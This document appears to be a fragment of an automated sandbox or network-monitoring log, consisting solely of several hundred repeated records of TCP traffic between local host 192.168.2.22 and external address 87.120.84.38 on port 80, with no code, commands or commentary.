      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
